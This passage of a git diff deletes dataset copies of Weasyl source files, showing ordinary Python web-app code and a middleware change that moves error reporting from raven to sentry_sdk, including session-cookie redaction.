birthdate - and the current date. 
- """ - now = arrow.now() - is_upcoming = (now.month, now.day) < (birthdate.month, birthdate.day) - - return now.year - birthdate.year - int(is_upcoming) - - -def user_type(userid): - if userid in staff.DIRECTORS: - return "director" - if userid in staff.TECHNICAL: - return "tech" - if userid in staff.ADMINS: - return "admin" - if userid in staff.MODS: - return "mod" - if userid in staff.DEVELOPERS: - return "dev" - - return None - - -@region.cache_on_arguments(expiration_time=180) -@record_timing -def _page_header_info(userid): - messages = engine.scalar( - "SELECT COUNT(*) FROM message WHERE otherid = %(user)s AND settings ~ 'u'", user=userid) - result = [messages, 0, 0, 0, 0] - - counts = engine.execute( - """ - SELECT type / 1000 AS group, COUNT(*) AS count - FROM welcome - LEFT JOIN submission - ON welcome.targetid = submission.submitid - AND welcome.type BETWEEN 2000 AND 2999 - WHERE - welcome.userid = %(user)s - AND ( - submission.rating IS NULL - OR submission.rating <= %(rating)s - ) - GROUP BY "group" - """, user=userid, rating=get_rating(userid)) - - for group, count in counts: - result[5 - group] = count - - return result - - -def page_header_info(userid): - from weasyl import media - sfw = get_current_request().cookies.get('sfwmode', 'nsfw') - return { - "welcome": _page_header_info(userid), - "userid": userid, - "username": get_display_name(userid), - "user_media": media.get_user_media(userid), - "sfw": sfw, - } - - -def common_page_start(userid, options=None, **extended_options): - if options is None: - options = [] - - userdata = None - if userid: - userdata = page_header_info(userid) - - data = render( - "common/page_start.html", [userdata, options, extended_options]) - - return [data] - - -def common_page_end(userid, page, options=None): - data = render("common/page_end.html", (options,)) - page.append(data) - return "".join(page) - - -def common_status_check(userid): - """ - Returns the name of the script to which the user should be redirected - if required. - """ - if not userid: - return None - - is_banned, is_suspended = get_login_settings(userid) - - if is_banned: - return "banned" - if is_suspended: - return "suspended" - - return None - - -def common_status_page(userid, status): - """ - Raise the redirect to the script returned by common_status_check() or render - the appropriate site status error page. - """ - if status in ('banned', 'suspended'): - from weasyl import moderation, login - - login.signout(get_current_request()) - if status == 'banned': - reason = moderation.get_ban_reason(userid) - return errorpage( - userid, - "Your account has been permanently banned and you are no longer allowed " - "to sign in.\n\n%s\n\nIf you believe this ban is in error, please " - "contact %s for assistance." % (reason, MACRO_SUPPORT_ADDRESS)) - - elif status == 'suspended': - suspension = moderation.get_suspension(userid) - return errorpage( - userid, - "Your account has been temporarily suspended and you are not allowed to " - "be logged in at this time.\n\n%s\n\nThis suspension will be lifted on " - "%s.\n\nIf you believe this suspension is in error, please contact " - "%s for assistance." % (suspension.reason, convert_date(suspension.release), MACRO_SUPPORT_ADDRESS)) - - -_content_types = { - 'submit': 110, - 'char': 120, - 'journal': 130, - 'profile': 210, -} - - -def common_view_content(userid, targetid, feature): - """ - Return True if a record was successfully inserted into the views table - and the page view statistic incremented, else False. 
- """ - if feature == "profile" and targetid == userid: - return - - typeid = _content_types.get(feature, 0) - if userid: - viewer = 'user:%d' % (userid,) - else: - viewer = get_address() - - result = engine.execute( - 'INSERT INTO views (viewer, targetid, type) VALUES (%(viewer)s, %(targetid)s, %(type)s) ON CONFLICT DO NOTHING', - viewer=viewer, targetid=targetid, type=typeid) - - if result.rowcount == 0: - return False - - if feature == "submit": - engine.execute("UPDATE submission SET page_views = page_views + 1 WHERE submitid = %(id)s", id=targetid) - elif feature == "char": - engine.execute("UPDATE character SET page_views = page_views + 1 WHERE charid = %(id)s", id=targetid) - elif feature == "journal": - engine.execute("UPDATE journal SET page_views = page_views + 1 WHERE journalid = %(id)s", id=targetid) - elif feature == "profile": - engine.execute("UPDATE profile SET page_views = page_views + 1 WHERE userid = %(id)s", id=targetid) - - return True - - -def append_to_log(logname, **parameters): - parameters['when'] = datetime.datetime.now().isoformat() - log_path = '%s%s.%s.log' % (macro.MACRO_SYS_LOG_PATH, logname, get_timestamp()) - with open(log_path, 'a') as outfile: - outfile.write(json.dumps(parameters)) - outfile.write('\n') - - -_CHARACTER_SETTINGS_FEATURE_SYMBOLS = { - "char/thumb": "-", - "char/cover": "~", - "char/submit": "=", -} - -_CHARACTER_SETTINGS_TYPE_EXTENSIONS = { - "J": ".jpg", - "P": ".png", - "G": ".gif", - "T": ".txt", - "H": ".htm", - "M": ".mp3", - "F": ".swf", - "A": ".pdf", -} - - -def url_type(settings, feature): - """ - Return the file extension specified in `settings` for the passed feature. - """ - symbol = _CHARACTER_SETTINGS_FEATURE_SYMBOLS[feature] - type_code = settings[settings.index(symbol) + 1] - - return _CHARACTER_SETTINGS_TYPE_EXTENSIONS[type_code] - - -def url_make(targetid, feature, query=None, root=False, file_prefix=None): - """ - Return the URL to a resource; if `root` is True, the path will start from - the root. 
- """ - result = [] if root else ["/"] - - if root: - result.append(macro.MACRO_STORAGE_ROOT) - - if "char/" in feature: - result.extend([macro.MACRO_URL_CHAR_PATH, _get_hash_path(targetid)]) - - if file_prefix is not None: - result.append("%s-" % (file_prefix,)) - - # Character file - if feature == "char/submit": - if query is None: - query = engine.execute("SELECT userid, settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "=" in query[1]: - result.append("%i.submit.%i%s" % (targetid, query[0], url_type(query[1], feature))) - else: - return None - # Character cover - elif feature == "char/cover": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "~" in query[0]: - result.append("%i.cover%s" % (targetid, url_type(query[0], feature))) - else: - return None - # Character thumbnail - elif feature == "char/thumb": - if query is None: - query = engine.execute("SELECT settings FROM character WHERE charid = %(id)s", id=targetid).first() - - if query and "-" in query[0]: - result.append("%i.thumb%s" % (targetid, url_type(query[0], feature))) - else: - return None if root else get_resource_path("img/default-visual.png") - # Character thumbnail selection - elif feature == "char/.thumb": - result.append("%i.new.thumb" % (targetid,)) - - return "".join(result) - - -def cdnify_url(url): - cdn_root = config_read_setting("cdn_root") - if not cdn_root: - return url - - return urljoin(cdn_root, url) - - -def get_resource_path(resource): - if reload_assets: - _load_resources() - - return '/' + resource_paths[resource] - - -def get_resource_url(resource): - """ - Get a full URL for a resource. - - Useful for <meta property="og:image">, for example. - """ - return 'https://www.weasyl.com' + get_resource_path(resource) - - -DEFAULT_SUBMISSION_THUMBNAIL = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-visual.png'), - ), -] - -DEFAULT_AVATAR = [ - dict.fromkeys( - ['display_url', 'file_url'], - get_resource_path('img/default-avatar.jpg'), - ), -] - - -def absolutify_url(url): - cdn_root = config_read_setting("cdn_root") - if cdn_root and url.startswith(cdn_root): - return url - - return urljoin(get_current_request().application_url, url) - - -def user_is_twitterbot(): - return get_current_request().environ.get('HTTP_USER_AGENT', '').startswith('Twitterbot') - - -def summarize(s, max_length=200): - if len(s) > max_length: - return s[:max_length - 1].rstrip() + u'\N{HORIZONTAL ELLIPSIS}' - return s - - -def clamp(val, lower_bound, upper_bound): - return min(max(val, lower_bound), upper_bound) - - -def timezones(): - ct = datetime.datetime.now(pytz.utc) - timezones_by_country = [ - (pytz.country_names[cc], [ - (int(ct.astimezone(pytz.timezone(tzname)).strftime("%z")), tzname) - for tzname in timezones - ]) - for cc, timezones in pytz.country_timezones.items()] - timezones_by_country.sort() - ret = [] - for country, timezones in timezones_by_country: - ret.append(('- %s -' % (country,), None)) - ret.extend( - ("[UTC%+05d] %s" % (offset, tzname.replace('_', ' ')), tzname) - for offset, tzname in timezones) - return ret - - -def query_string(query): - pairs = [] - - for key, value in query.items(): - if isinstance(value, (tuple, list, set)): - for subvalue in value: - pairs.append((key, subvalue)) - elif value: - pairs.append((key, value)) - - return urlencode(pairs) - - -def _requests_wrapper(func_name): - func = getattr(requests, func_name) - - def wrapper(*a, **kw): - try: - return
func(*a, **kw) - except Exception as e: - capture_exception(e, level='info') - w = WeasylError('httpError') - w.error_suffix = 'The original error was: %s' % (e,) - raise w from e - - return wrapper - - -http_get = _requests_wrapper('get') -http_post = _requests_wrapper('post') - - -def metric(*a, **kw): - pass - - -def iso8601(unixtime): - if isinstance(unixtime, arrow.Arrow) or isinstance(unixtime, datetime.datetime): - return unixtime.isoformat().partition('.')[0] + 'Z' - else: - return datetime.datetime.utcfromtimestamp(unixtime - _UNIXTIME_OFFSET).isoformat() + 'Z' - - -def parse_iso8601(s): - return arrow.Arrow.strptime(s, '%Y-%m-%dT%H:%M:%SZ').timestamp + _UNIXTIME_OFFSET - - -def paginate(results, backid, nextid, limit, key): - at_start = at_end = False - # if neither value is specified, we're definitely at the start - if not backid and not nextid: - at_start = True - - # if we were cut short... - if len(results) <= limit: - if backid: - # if moving backward we're at the start - at_start = True - else: - # if moving forward we're at the end - at_end = True - elif backid: - # delete extraneous rows from the front if we're moving backward - del results[:-limit] - else: - # or from the back if we're moving forward - del results[limit:] - - return ( - None if at_start or not results else results[0][key], - None if at_end or not results else results[-1][key]) - - -def thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb. - """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - if (profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id): - thumb_key = 'thumbnail-generated' - else: - thumb_key = 'thumbnail-custom' if 'thumbnail-custom' in submission['sub_media'] else 'thumbnail-generated' - - return submission['sub_media'][thumb_key][0] - - -def webp_thumb_for_sub(submission): - """ - Given a submission dict containing sub_media, sub_type and userid, - returns the appropriate WebP media item to use as a thumbnail. - - Params: - submission: The submission. - - Returns: - The sub media to use as a thumb, or None. 
- """ - user_id = get_userid() - profile_settings = get_profile_settings(user_id) - disable_custom_thumb = ( - profile_settings.disable_custom_thumbs and - submission.get('subtype', 9999) < 2000 and - submission['userid'] != user_id - ) - - if not disable_custom_thumb and 'thumbnail-custom' in submission['sub_media']: - return None - - thumbnail_generated_webp = submission['sub_media'].get('thumbnail-generated-webp') - return thumbnail_generated_webp and thumbnail_generated_webp[0] diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff deleted file mode 100644 index 9bace97..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.diff +++ /dev/null @@ -1,203 +0,0 @@ -diff --git a/weasyl/middleware.py b/weasyl/middleware.py - index 97717e00368e9f650dd2daf3493ee76291dc5710..d10cb162447d9e3a9506b76054851863b10ff27a 100644 - --- a/weasyl/middleware.py - +++ b/weasyl/middleware.py -@@ -1,20 +1,15 @@ - import html --import os - import re --import sys -+import secrets - import time --import base64 --import logging --import raven --import raven.processors - import traceback - - from pyramid.httpexceptions import HTTPUnauthorized - from pyramid.response import Response - from pyramid.threadlocal import get_current_request -+from sentry_sdk import capture_exception, capture_message, push_scope, set_user - from sqlalchemy import event - from sqlalchemy.engine import Engine --from twisted.internet.threads import blockingCallFromThread - from web.utils import storify - - from libweasyl import staff -@@ -22,7 +17,6 @@ from libweasyl.cache import ThreadCacheProxy - from libweasyl.models.users import GuestSession - from weasyl import define as d - from weasyl import errorcode --from weasyl import http - from weasyl import orm - from weasyl.error import WeasylError - from weasyl.sessions import create_guest_session, is_guest_token -@@ -102,6 +96,10 @@ def session_tween_factory(handler, registry): - - request.weasyl_session = sess_obj - -+ set_user( -+ {"id": sess_obj.userid} if sess_obj.userid -+ else {"ip_address": request.client_addr}) -+ - # Register a response callback to set the session cookies before returning. - # Note that this requires that exceptions are handled properly by our exception view. - request.add_response_callback(callback) -@@ -260,14 +258,6 @@ def userid_request_property(request): - return 0 if userid is None else userid - - --def log_exc_request_method(request, **kwargs): -- """ -- Method on requests to log exceptions. -- """ -- # It's unclear to me why this should be a request method and not just define.log_exc(). -- return request.environ.get('raven.captureException', lambda **kw: traceback.print_exc())(**kwargs) -- -- - def web_input_request_method(request, *required, **kwargs): - """ - Callable that processes the pyramid request.params multidict into a web.py storage object -@@ -312,8 +302,7 @@ def weasyl_exception_view(exc, request): - A view for general exceptions thrown by weasyl code. - """ - if isinstance(exc, ClientGoneAway): -- if 'raven.captureMessage' in request.environ: -- request.environ['raven.captureMessage']('HTTP client went away', level=logging.INFO) -+ capture_message('HTTP client went away') - return request.response - else: - # Avoid using the reified request.userid property here. 
It might not be set and it might -@@ -336,10 +325,11 @@ def weasyl_exception_view(exc, request): - message = '%s %s' % (message, exc.error_suffix) - return Response(d.errorpage(userid, message, **errorpage_kwargs), - status_code=status_code) -- request_id = None -- if 'raven.captureException' in request.environ: -- request_id = base64.b64encode(os.urandom(6), b'+-').decode('ascii') -- event_id = request.environ['raven.captureException'](request_id=request_id) -+ request_id = secrets.token_urlsafe(6) -+ with push_scope() as scope: -+ scope.set_tag('request_id', request_id) -+ event_id = capture_exception(exc) -+ if event_id is not None: - request_id = '%s-%s' % (event_id, request_id) - print("unhandled error (request id %s) in %r" % (request_id, request.environ)) - traceback.print_exc() -@@ -349,39 +339,17 @@ def weasyl_exception_view(exc, request): - return Response(d.errorpage(userid, request_id=request_id, **errorpage_kwargs), status_code=500) - - --class RemoveSessionCookieProcessor(raven.processors.Processor): -- """ -- Removes Weasyl session cookies. -- """ -- def _filter_header(self, value): -- return re.sub( -- r'WZL=(\w+)', -- lambda match: 'WZL=' + '*' * len(match.group(1)), -- value) -- -- def filter_http(self, data): -- if 'cookies' in data: -- data['cookies'] = self._filter_header(data['cookies']) -- -- if 'headers' in data and 'Cookie' in data['headers']: -- data['headers']['Cookie'] = self._filter_header(data['headers']['Cookie']) -- -- env = data.get('env') -- -- if env is not None: -- if 'HTTP_COOKIE' in env: -- env['HTTP_COOKIE'] = self._filter_header(env['HTTP_COOKIE']) -- -- # WebOb cache, like: -- # - webob._parsed_query_vars -- # - webob._body_file -- # - webob._parsed_post_vars -- # - webob._parsed_cookies -- # These mostly just repeat information that can be found elsewhere, -- # so they’re removed rather than filtered. 
-- remove_keys = [key for key in env if key.startswith('webob._')] -- for key in remove_keys: -- del env[key] -+def strip_session_cookie(event, hint): -+ if request := event.get('request'): -+ if (headers := request.get('headers')) and 'Cookie' in headers: -+ headers['Cookie'] = re.sub( -+ r'(WZL="?)([^";]+)', -+ lambda match: match.group(1) + '*' * len(match.group(2)), -+ headers['Cookie'] -+ ) -+ if (cookies := request.get('cookies')) and 'WZL' in cookies: -+ cookies['WZL'] = '*' * len(cookies['WZL']) -+ return event - - - class URLSchemeFixingMiddleware(object): -@@ -394,64 +362,6 @@ class URLSchemeFixingMiddleware(object): - return self.app(environ, start_response) - - --class SentryEnvironmentMiddleware(object): -- def __init__(self, app, dsn, reactor=None): -- self.app = app -- self.client = raven.Client( -- dsn=dsn, -- release=d.CURRENT_SHA, -- processors=[ -- 'raven.processors.SanitizePasswordsProcessor', -- 'weasyl.middleware.RemoveSessionCookieProcessor', -- ], -- ) -- if reactor is None: -- from twisted.internet import reactor -- self.reactor = reactor -- -- def ravenCaptureArguments(self, level=None, **extra): -- request = get_current_request() -- data = { -- 'level': level, -- 'user': { -- 'id': d.get_userid(), -- 'ip_address': d.get_address(), -- }, -- 'request': { -- 'url': request.environ['PATH_INFO'], -- 'method': request.environ['REQUEST_METHOD'], -- 'data': request.POST, -- 'query_string': request.environ['QUERY_STRING'], -- 'headers': http.get_headers(request.environ), -- 'env': request.environ, -- }, -- } -- -- return { -- 'data': data, -- 'extra': dict( -- extra, -- session=getattr(request, 'weasyl_session', None), -- ), -- } -- -- def captureException(self, **extra): -- kwargs = self.ravenCaptureArguments(**extra) -- exc_info = sys.exc_info() -- return blockingCallFromThread( -- self.reactor, self.client.captureException, exc_info, **kwargs) -- -- def captureMessage(self, message, **extra): -- kwargs = self.ravenCaptureArguments(**extra) -- return blockingCallFromThread( -- self.reactor, self.client.captureMessage, message, **kwargs) -- -- def __call__(self, environ, start_response): -- environ['raven.captureException'] = self.captureException -- environ['raven.captureMessage'] = self.captureMessage -- return self.app(environ, start_response) -- -- - def _wrapperfunc(name): - def wrap(self, *a, **kw): - meth = getattr(self._wrapped, name) diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py deleted file mode 100644 index 4d19027..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.source.py +++ /dev/null @@ -1,505 +0,0 @@ -import html -import os -import re -import sys -import time -import base64 -import logging -import raven -import raven.processors -import traceback - -from pyramid.httpexceptions import HTTPUnauthorized -from pyramid.response import Response -from pyramid.threadlocal import get_current_request -from sqlalchemy import event -from sqlalchemy.engine import Engine -from twisted.internet.threads import blockingCallFromThread -from web.utils import storify - -from libweasyl import staff -from libweasyl.cache import ThreadCacheProxy -from libweasyl.models.users import GuestSession -from weasyl import define as d -from weasyl import errorcode -from weasyl import http -from weasyl import orm -from weasyl.error import WeasylError -from weasyl.sessions import create_guest_session, is_guest_token - - -class ClientGoneAway(Exception): 
- pass - - -def cache_clear_tween_factory(handler, registry): - """ - A tween to clear the thread local cache. - """ - def cache_clear_tween(request): - try: - return handler(request) - finally: - ThreadCacheProxy.zap_cache() - return cache_clear_tween - - -def db_timer_tween_factory(handler, registry): - """ - A tween that records timing information in the headers of a response. - """ - def db_timer_tween(request): - started_at = time.perf_counter() - request.sql_times = [] - request.memcached_times = [] - resp = handler(request) - ended_at = time.perf_counter() - time_in_sql = sum(request.sql_times) - time_in_memcached = sum(request.memcached_times) - time_in_python = ended_at - started_at - time_in_sql - time_in_memcached - resp.headers['X-SQL-Time-Spent'] = '%0.1fms' % (time_in_sql * 1000,) - resp.headers['X-Memcached-Time-Spent'] = '%0.1fms' % (time_in_memcached * 1000,) - resp.headers['X-Python-Time-Spent'] = '%0.1fms' % (time_in_python * 1000,) - resp.headers['X-SQL-Queries'] = str(len(request.sql_times)) - resp.headers['X-Memcached-Queries'] = str(len(request.memcached_times)) - return resp - return db_timer_tween - - -def session_tween_factory(handler, registry): - """ - A tween that sets a weasyl_session on a request. - """ - def callback(request, response): - sess_obj = request.weasyl_session - - if isinstance(sess_obj, GuestSession): - if sess_obj.create: - response.set_cookie('WZL', sess_obj.sessionid, max_age=None, - secure=request.scheme == 'https', httponly=True) - elif sess_obj.save: - session = request.pg_connection - - if sess_obj.create: - session.add(sess_obj) - response.set_cookie('WZL', sess_obj.sessionid, max_age=60 * 60 * 24 * 365, - secure=request.scheme == 'https', httponly=True) - session.flush() - - # TODO(hyena): Investigate a pyramid session_factory implementation instead. - def session_tween(request): - sess_obj = None - cookie = request.cookies.get('WZL') - - if cookie is not None: - if is_guest_token(cookie): - sess_obj = GuestSession(cookie) - else: - sess_obj = request.pg_connection.query(orm.Session).get(cookie) - - if sess_obj is None: - sess_obj = create_guest_session() - - request.weasyl_session = sess_obj - - # Register a response callback to set the session cookies before returning. - # Note that this requires that exceptions are handled properly by our exception view. - request.add_response_callback(callback) - return handler(request) - - return session_tween - - -def query_debug_tween_factory(handler, registry): - """ - A tween that allows developers to view timing per query. - """ - def callback(request, response): - if not hasattr(request, 'weasyl_session') or request.weasyl_session.userid not in staff.DEVELOPERS: - return - - class ParameterCounter(object): - def __init__(self): - self.next = 1 - self.ids = {} - - def __getitem__(self, name): - id = self.ids.get(name) - - if id is None: - id = self.ids[name] = self.next - self.next += 1 - - return u'$%i' % (id,) - - debug_rows = [] - - for statement, t in request.query_debug: - statement = u' '.join(statement.split()).replace(u'( ', u'(').replace(u' )', u')') % ParameterCounter() - debug_rows.append(u'<tr><td>%.1f ms</td><td>%s</td></tr>' % (t * 1000, html.escape(statement))) - - response.text += u''.join( - [u'<table>'] - + debug_rows - + [u'</table>
'] - ) - - def query_debug_tween(request): - if 'query_debug' in request.params: - request.query_debug = [] - request.add_response_callback(callback) - - return handler(request) - - return query_debug_tween - - -def status_check_tween_factory(handler, registry): - """ - A tween that checks if the weasyl user is banned, suspended, etc. and redirects appropriately. - - Rather than performing these checks on every view. - """ - def status_check_tween(request): - status = d.common_status_check(request.userid) - if status: - return Response(d.common_status_page(request.userid, status)) - return handler(request) - return status_check_tween - - -def database_session_cleanup_tween_factory(handler, registry): - """ - A tween that cleans up the thread-local database session after every request. - """ - def database_session_cleanup_tween(request): - def cleanup(request): - d.sessionmaker.remove() - - request.add_finished_callback(cleanup) - return handler(request) - - return database_session_cleanup_tween - - -def _generate_http2_server_push_headers(): - """ - Generates the Link headers to load HTTP/2 Server Push resources which are needed on each pageload. Written - as a separate function to only execute this code a single time, since we just need to generate this each - time the code is relaunched (e.g., each time the web workers are kicked to a new version of the code). - - A component of ``http2_server_push_tween_factory`` - :return: An ASCII encoded string to be loaded into the Link header set inside of ``http2_server_push_tween_factory`` - """ - css_preload = [ - '<' + item + '>; rel=preload; as=style' for item in [ - d.get_resource_path('css/site.css'), - d.get_resource_path('fonts/museo500.css'), - ] - ] - - js_preload = [ - '<' + item + '>; rel=preload; as=script' for item in [ - d.get_resource_path('js/jquery-2.2.4.min.js'), - d.get_resource_path('js/scripts.js'), - ] - ] - - return ", ".join(css_preload + js_preload) - - -# Part of the `Link` header that will be set in the `http2_server_push_tween_factory` function, below -HTTP2_LINK_HEADER_PRELOADS = _generate_http2_server_push_headers() - - -def http2_server_push_tween_factory(handler, registry): - """ - Add the 'Link' header to outgoing responses to HTTP/2 Server Push render-blocking resources - """ - def http2_server_push(request): - resp = handler(request) - - # Combined HTTP/2 headers indicating which resources to server push - resp.headers['Link'] = HTTP2_LINK_HEADER_PRELOADS - return resp - return http2_server_push - - -# Properties and methods to enhance the pyramid `request`. -def pg_connection_request_property(request): - """ - Used for the reified pg_connection property on weasyl requests. - """ - return d.sessionmaker() - - -def userid_request_property(request): - """ - Used for the userid property on weasyl requests. - """ - api_token = request.headers.get('X_WEASYL_API_KEY') - authorization = request.headers.get('AUTHORIZATION') - if api_token is not None: - # TODO: If reification of userid becomes an issue (e.g. because of userid changing after sign-in) revisit this. - # It's possible that we don't need to reify the entire property, but just cache the result of this query in a - # cache on arguments inner function. 
- userid = d.engine.scalar("SELECT userid FROM api_tokens WHERE token = %(token)s", token=api_token) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Weasyl-API-Key', 'realm="Weasyl"')) - return userid - - elif authorization: - from weasyl.oauth2 import get_userid_from_authorization - userid = get_userid_from_authorization(request) - if not userid: - raise HTTPUnauthorized(www_authenticate=('Bearer', 'realm="Weasyl" error="invalid_token"')) - return userid - - else: - userid = request.weasyl_session.userid - return 0 if userid is None else userid - - -def log_exc_request_method(request, **kwargs): - """ - Method on requests to log exceptions. - """ - # It's unclear to me why this should be a request method and not just define.log_exc(). - return request.environ.get('raven.captureException', lambda **kw: traceback.print_exc())(**kwargs) - - -def web_input_request_method(request, *required, **kwargs): - """ - Callable that processes the pyramid request.params multidict into a web.py storage object - in the style of web.input(). - TODO: Replace usages of this method with accessing request directly. - - @param request: The pyramid request object. - @param kwargs: Default values. If a default value is a list, it indicates that multiple - values of that key should be collapsed into a list. - @return: A dictionary-like object in the fashion of web.py's web.input() - """ - return storify(request.params.mixed(), *required, **kwargs) - - -# Methods to add response callbacks to a request. The callbacks run in the order they -# were registered. Note that these will not run if an exception is thrown that isn't handled by -# our exception view. -def set_cookie_on_response(request, name=None, value='', max_age=None, path='/', domain=None, - secure=False, httponly=False, comment=None, overwrite=False): - """ - Registers a callback on the request to set a cookie in the response. - Parameters have the same meaning as ``pyramid.response.Response.set_cookie``. - """ - def callback(request, response): - response.set_cookie(name, value, max_age, path, domain, secure, httponly, comment, - overwrite) - request.add_response_callback(callback) - - -def delete_cookie_on_response(request, name, path='/', domain=None): - """ - Register a callback on the request to delete a cookie from the client. - Parameters have the same meaning as ``pyramid.response.Response.delete_cookie``. - """ - def callback(request, response): - response.delete_cookie(name, path, domain) - request.add_response_callback(callback) - - -def weasyl_exception_view(exc, request): - """ - A view for general exceptions thrown by weasyl code. - """ - if isinstance(exc, ClientGoneAway): - if 'raven.captureMessage' in request.environ: - request.environ['raven.captureMessage']('HTTP client went away', level=logging.INFO) - return request.response - else: - # Avoid using the reified request.userid property here. It might not be set and it might - # have changed due to signin/out. - if hasattr(request, 'weasyl_session'): - userid = request.weasyl_session.userid - else: - userid = 0 - request.userid = 0 # To keep templates happy. 
- errorpage_kwargs = {} - if isinstance(exc, WeasylError): - status_code = errorcode.error_status_code.get(exc.value, 422) - if exc.render_as_json: - return Response(json={'error': {'name': exc.value}}, - status_code=status_code) - errorpage_kwargs = exc.errorpage_kwargs - if exc.value in errorcode.error_messages: - message = errorcode.error_messages[exc.value] - if exc.error_suffix: - message = '%s %s' % (message, exc.error_suffix) - return Response(d.errorpage(userid, message, **errorpage_kwargs), - status_code=status_code) - request_id = None - if 'raven.captureException' in request.environ: - request_id = base64.b64encode(os.urandom(6), b'+-').decode('ascii') - event_id = request.environ['raven.captureException'](request_id=request_id) - request_id = '%s-%s' % (event_id, request_id) - print("unhandled error (request id %s) in %r" % (request_id, request.environ)) - traceback.print_exc() - if getattr(exc, "__render_as_json", False): - return Response(json={'error': {}}, status_code=500) - else: - return Response(d.errorpage(userid, request_id=request_id, **errorpage_kwargs), status_code=500) - - -class RemoveSessionCookieProcessor(raven.processors.Processor): - """ - Removes Weasyl session cookies. - """ - def _filter_header(self, value): - return re.sub( - r'WZL=(\w+)', - lambda match: 'WZL=' + '*' * len(match.group(1)), - value) - - def filter_http(self, data): - if 'cookies' in data: - data['cookies'] = self._filter_header(data['cookies']) - - if 'headers' in data and 'Cookie' in data['headers']: - data['headers']['Cookie'] = self._filter_header(data['headers']['Cookie']) - - env = data.get('env') - - if env is not None: - if 'HTTP_COOKIE' in env: - env['HTTP_COOKIE'] = self._filter_header(env['HTTP_COOKIE']) - - # WebOb cache, like: - # - webob._parsed_query_vars - # - webob._body_file - # - webob._parsed_post_vars - # - webob._parsed_cookies - # These mostly just repeat information that can be found elsewhere, - # so they’re removed rather than filtered. 
- remove_keys = [key for key in env if key.startswith('webob._')] - for key in remove_keys: - del env[key] - - -class URLSchemeFixingMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - if environ.get('HTTP_X_FORWARDED_PROTO') == 'https': - environ['wsgi.url_scheme'] = 'https' - return self.app(environ, start_response) - - -class SentryEnvironmentMiddleware(object): - def __init__(self, app, dsn, reactor=None): - self.app = app - self.client = raven.Client( - dsn=dsn, - release=d.CURRENT_SHA, - processors=[ - 'raven.processors.SanitizePasswordsProcessor', - 'weasyl.middleware.RemoveSessionCookieProcessor', - ], - ) - if reactor is None: - from twisted.internet import reactor - self.reactor = reactor - - def ravenCaptureArguments(self, level=None, **extra): - request = get_current_request() - data = { - 'level': level, - 'user': { - 'id': d.get_userid(), - 'ip_address': d.get_address(), - }, - 'request': { - 'url': request.environ['PATH_INFO'], - 'method': request.environ['REQUEST_METHOD'], - 'data': request.POST, - 'query_string': request.environ['QUERY_STRING'], - 'headers': http.get_headers(request.environ), - 'env': request.environ, - }, - } - - return { - 'data': data, - 'extra': dict( - extra, - session=getattr(request, 'weasyl_session', None), - ), - } - - def captureException(self, **extra): - kwargs = self.ravenCaptureArguments(**extra) - exc_info = sys.exc_info() - return blockingCallFromThread( - self.reactor, self.client.captureException, exc_info, **kwargs) - - def captureMessage(self, message, **extra): - kwargs = self.ravenCaptureArguments(**extra) - return blockingCallFromThread( - self.reactor, self.client.captureMessage, message, **kwargs) - - def __call__(self, environ, start_response): - environ['raven.captureException'] = self.captureException - environ['raven.captureMessage'] = self.captureMessage - return self.app(environ, start_response) - - -def _wrapperfunc(name): - def wrap(self, *a, **kw): - meth = getattr(self._wrapped, name) - try: - return meth(*a, **kw) - except ValueError: - raise ClientGoneAway() - return wrap - - -class InputWrap(object): - def __init__(self, wrapped): - self._wrapped = wrapped - - read = _wrapperfunc('read') - readline = _wrapperfunc('readline') - readlines = _wrapperfunc('readlines') - - def __iter__(self): - it = iter(self._wrapped) - while True: - try: - yield next(it) - except StopIteration: - return - except ValueError: - raise ClientGoneAway() - - -class InputWrapMiddleware(object): - def __init__(self, app): - self.app = app - - def __call__(self, environ, start_response): - environ['wsgi.input'] = InputWrap(environ['wsgi.input']) - return self.app(environ, start_response) - - -@event.listens_for(Engine, 'before_cursor_execute') -def before_cursor_execute(conn, cursor, statement, parameters, context, executemany): - context._query_start_time = time.perf_counter() - - -@event.listens_for(Engine, 'after_cursor_execute') -def after_cursor_execute(conn, cursor, statement, parameters, context, executemany): - total = time.perf_counter() - context._query_start_time - request = get_current_request() # TODO: There should be a better way to save this. 
- if hasattr(request, 'sql_times'): - request.sql_times.append(total) - if hasattr(request, 'query_debug'): - request.query_debug.append((statement, total)) diff --git a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py b/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py deleted file mode 100644 index 20dfc45..0000000 --- a/v1/data/codefile/weasyl@weasyl__d10cb16__weasyl$middleware.py.target.py +++ /dev/null @@ -1,415 +0,0 @@ -import html -import re -import secrets -import time -import traceback - -from pyramid.httpexceptions import HTTPUnauthorized -from pyramid.response import Response -from pyramid.threadlocal import get_current_request -from sentry_sdk import capture_exception, capture_message, push_scope, set_user -from sqlalchemy import event -from sqlalchemy.engine import Engine -from web.utils import storify - -from libweasyl import staff -from libweasyl.cache import ThreadCacheProxy -from libweasyl.models.users import GuestSession -from weasyl import define as d -from weasyl import errorcode -from weasyl import orm -from weasyl.error import WeasylError -from weasyl.sessions import create_guest_session, is_guest_token - - -class ClientGoneAway(Exception): - pass - - -def cache_clear_tween_factory(handler, registry): - """ - A tween to clear the thread local cache. - """ - def cache_clear_tween(request): - try: - return handler(request) - finally: - ThreadCacheProxy.zap_cache() - return cache_clear_tween - - -def db_timer_tween_factory(handler, registry): - """ - A tween that records timing information in the headers of a response. - """ - def 